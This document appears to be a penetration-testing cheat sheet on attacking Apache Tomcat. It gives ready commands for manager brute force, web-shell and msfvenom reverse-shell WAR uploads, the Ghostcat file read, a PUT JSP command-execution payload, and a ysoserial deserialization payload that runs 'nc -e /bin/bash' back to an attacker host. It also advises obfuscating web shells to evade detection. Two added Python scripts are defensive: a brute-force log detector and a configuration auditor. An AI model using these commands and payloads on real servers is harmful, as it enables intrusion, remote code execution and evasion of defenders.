8. Attacking Tomcat

1. Tomcat Manager Brute-Force:

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT <target_port>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST <target_vhost>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
python3 mgr_brute.py -U http://<target>:<port>/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
  • Brute-force attack on the Tomcat Manager login, using either the Metasploit module or the mgr_brute.py script with the Metasploit default user/password wordlists.
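From the defender's side, the brute force in this section leaves a distinctive trace in Tomcat's access log: a burst of 401 responses for /manager/html from one source, sometimes followed by a 200 with an authenticated user once a default pair lands. The following Python script is an added example (not part of this page, of Metasploit or of mgr_brute.py) that runs that detection over a few constructed access-log lines in the default AccessLogValve "common" pattern; the threshold, the time window and the sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the default AccessLogValve "common" pattern
# (client, identd, authenticated user, timestamp, request, status, bytes).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - admin [10/Mar/2024:12:00:04 +0000] "GET /manager/html HTTP/1.1" 200 19385
198.51.100.9 - - [10/Mar/2024:12:00:05 +0000] "GET /index.jsp HTTP/1.1" 200 1024
198.51.100.9 - - [10/Mar/2024:12:05:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag source IPs with >= threshold 401s against /manager or /host-manager
    inside `window` (assumed values), and record whether the same IP later
    authenticated, i.e. whether the guessing succeeded."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(("/manager", "/host-manager")):
            continue
        if rec["status"] == 401:
            failures[rec["ip"]].append(rec["ts"])
        elif rec["status"] == 200 and rec["user"] != "-":
            successes[rec["ip"]].append((rec["ts"], rec["user"]))

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # slide the window start forward until it spans at most `window`
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                landed = [user for ts, user in successes[ip] if ts >= times[start]]
                alerts[ip] = {
                    "failures": end - start + 1,
                    "first_seen": times[start].isoformat(),
                    "success_user": landed[0] if landed else None,
                }
                break
    return alerts
```

Running `detect_manager_bruteforce(SAMPLE_LOG)` on the constructed lines reports 203.0.113.7 with five failures in two seconds and a subsequent successful login as `admin`, while the single 401 from 198.51.100.9 stays below the threshold. The same pattern maps onto a SIEM rule keyed on status 401 and a request path prefix of /manager.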


2. WAR File Upload (After Login):

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
  • Upload the .war file via the /manager/html interface.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f war > backup.war
nc -lnvp <attacker_port>
  • Generates a reverse shell .war payload and sets up a listener.


3. CVE-2020-1938 (Ghostcat - AJP LFI Exploit):

nmap -sV -p 8009,8080 <target_ip>
python2.7 tomcat-ajp.lfi.py <target_ip> -p 8009 -f WEB-INF/web.xml
  • Exploits the AJP connector (port 8009) to read files from the web application, such as WEB-INF/web.xml.


4. Exploiting CVE-2009-3548 (Tomcat Deployment Bypass):

curl -T shell.war http://<target_ip>:8080/manager/deploy?path=/shell
  • Uploads a .war file without authentication on vulnerable Tomcat instances.


5. Exploiting CVE-2017-12617 (Arbitrary JSP Upload via HTTP PUT):

curl -v -X PUT -d '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' http://<target>:8080/shell.jsp
  • Allows arbitrary JSP file upload, enabling remote command execution.


6. Tomcat Weak Configuration & Exploitation:

curl -u admin:admin http://<target>:8080/manager/html
  • Many Tomcat servers use default credentials.


7. Exploiting CVE-2020-9484 (Tomcat Deserialization RCE):

ysoserial -g CommonsCollections6 -o raw -c "nc -e /bin/bash <attacker_ip> <port>" > payload.ser
curl -X POST -H "Content-Type: application/x-java-serialized-object" --data-binary @payload.ser http://<target>:8080
  • Exploits Java deserialization in persistent sessions for RCE.


8. Attacking Tomcat with Metasploit (RCE via JSP Upload):

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <target_ip>
set USERNAME admin
set PASSWORD admin
run
  • Deploys a JSP shell on a vulnerable Tomcat instance.


9. Exploiting Tomcat with JMX RMI (CVE-2016-8735):

msfconsole
use exploit/multi/misc/java_jmx_server
set RHOST <target_ip>
set RPORT 1099
run
  • Gains remote access via exposed JMX RMI endpoints.


10. Tomcat JMX Exploitation:

java -jar jmxterm-1.0-alpha-4-uber.jar --url service:jmx:rmi:///jndi/rmi://<target_ip>:<port>/jmxrmi
  • Enumerates and interacts with JMX services for possible RCE.


11. Tomcat Connectors (AJP & HTTP Connector Misconfigurations):

  • AJP connectors can expose internal resources.

  • HTTP connectors can lead to authentication bypass.
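The PUT upload in section 5, the default credentials in section 6, the session deserialization in section 7 and the connector misconfigurations in this section all come down to settings in Tomcat's own configuration files, so they can be audited offline before anyone reaches the service. The following Python script is an added example, not part of this page or of Tomcat, that parses constructed fragments of server.xml, web.xml, tomcat-users.xml and context.xml and flags the weak setting each of those sections relies on: an AJP connector reachable beyond loopback or without a shared secret (Ghostcat, section 3), DefaultServlet readonly=false (CVE-2017-12617, section 5), default or short manager-role passwords (section 6), and a PersistentManager without sessionAttributeValueClassNameFilter (CVE-2020-9484, section 7). The sample fragments, the default-credential set and the 12-character password threshold are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample configuration fragments; each carries a weak setting on purpose.
SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

TOMCAT_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="Xk9!long-random-pw" roles="manager-script"/>
</tomcat-users>"""

CONTEXT_XML = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore" directory="/tmp/sessions"/>
  </Manager>
</Context>"""

# Assumed short list of well-known default pairs (the Metasploit wordlist above is a superset).
DEFAULT_CREDS = {("admin", "admin"), ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "")}
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}


def _local(tag):
    """Strip an XML namespace prefix so lookups work with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def _descendants(elem, name):
    return [e for e in elem.iter() if _local(e.tag) == name]


def audit_server_xml(text):
    """Flag AJP connectors reachable beyond loopback or lacking a shared secret."""
    findings = []
    for c in _descendants(ET.fromstring(text), "Connector"):
        if not c.get("protocol", "HTTP/1.1").startswith("AJP"):
            continue
        port, addr = c.get("port"), c.get("address")
        if addr not in ("127.0.0.1", "::1", "localhost"):
            findings.append(f"AJP connector {port}: not bound to loopback (address={addr or 'unset'})")
        # Tomcat 9.0.31+/8.5.51+ default secretRequired=true; a missing secret is treated as a finding.
        if c.get("secretRequired", "true").lower() != "true" or not c.get("secret"):
            findings.append(f"AJP connector {port}: no shared secret configured")
    return findings


def audit_web_xml(text):
    """Flag DefaultServlet readonly=false, which lets HTTP PUT/DELETE write into the webapp."""
    findings = []
    for servlet in _descendants(ET.fromstring(text), "servlet"):
        cls = next((e.text or "" for e in _descendants(servlet, "servlet-class")), "")
        if cls.strip() != "org.apache.catalina.servlets.DefaultServlet":
            continue
        params = {}
        for p in _descendants(servlet, "init-param"):
            name = next((e.text or "" for e in _descendants(p, "param-name")), "")
            value = next((e.text or "" for e in _descendants(p, "param-value")), "")
            params[name.strip()] = value.strip().lower()
        if params.get("readonly", "true") == "false":
            findings.append("DefaultServlet readonly=false: HTTP PUT/DELETE can write files into the webapp")
    return findings


def audit_tomcat_users(text):
    """Flag default credentials, or short passwords on accounts holding manager/admin roles."""
    findings = []
    for u in _descendants(ET.fromstring(text), "user"):
        name, pw = u.get("username", ""), u.get("password", "")
        roles = {r.strip() for r in u.get("roles", "").split(",")}
        if (name, pw) in DEFAULT_CREDS:
            findings.append(f"user {name!r}: default/well-known credentials")
        elif roles & MANAGER_ROLES and len(pw) < 12:
            findings.append(f"user {name!r}: short password on a manager-role account")
    return findings


def audit_context_xml(text):
    """Flag a PersistentManager that deserializes stored sessions without a class-name filter."""
    findings = []
    for m in _descendants(ET.fromstring(text), "Manager"):
        if m.get("className", "").endswith("PersistentManager") and not m.get("sessionAttributeValueClassNameFilter"):
            findings.append("PersistentManager without sessionAttributeValueClassNameFilter: unrestricted session deserialization")
    return findings


def audit_all(server_xml, web_xml, users_xml, context_xml):
    return {
        "server.xml": audit_server_xml(server_xml),
        "web.xml": audit_web_xml(web_xml),
        "tomcat-users.xml": audit_tomcat_users(users_xml),
        "context.xml": audit_context_xml(context_xml),
    }
```

`audit_all(SERVER_XML, WEB_XML, TOMCAT_USERS_XML, CONTEXT_XML)` returns a finding list per file; on the constructed fragments it reports the exposed AJP connector twice (no loopback binding, no secret), the writable DefaultServlet, the admin/admin account and the unfiltered PersistentManager, and an AJP connector with `address="127.0.0.1"` and a `secret` produces no finding. For a real deployment the same functions are pointed at the files under `$CATALINA_BASE/conf`.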


12. Important Considerations & Post-Exploitation:

  • /manager Access: Direct access can lead to RCE.

  • Default Credentials: Often present and should be checked first.

  • Ghostcat (CVE-2020-1938): Can expose sensitive configuration files.

  • WAR Files: Can be used for persistence and privilege escalation.

  • JMX Attacks: Can allow attackers to execute arbitrary code.

  • Version-Specific Vulnerabilities: Always check Tomcat’s version for known exploits.

  • Web Shell Security: Encrypt and obfuscate web shells to evade detection.

  • Post-Exploitation: Once inside, enumerate the system and escalate privileges.

Example Additions:

  • AJP Exploitation: "The AJP protocol, if misconfigured, can allow access to internal resources and serious attacks."

  • Tomcat JMX Exploitation: "Tomcat JMX can execute arbitrary code by interacting with MBeans."

  • Tomcat Connectors: "Tomcat connectors, such as the AJP and HTTP connectors, can be misconfigured, leading to security risks."

  • Web Shell Evasion: "Web shells can be obfuscated and encoded to bypass security measures."

  • Post-Exploitation: "After gaining access to a Tomcat server, it is important to enumerate the system and find other vulnerabilities."

  • Tomcat Version-Specific Attacks: "Tomcat versions often have unique vulnerabilities, requiring targeted research."
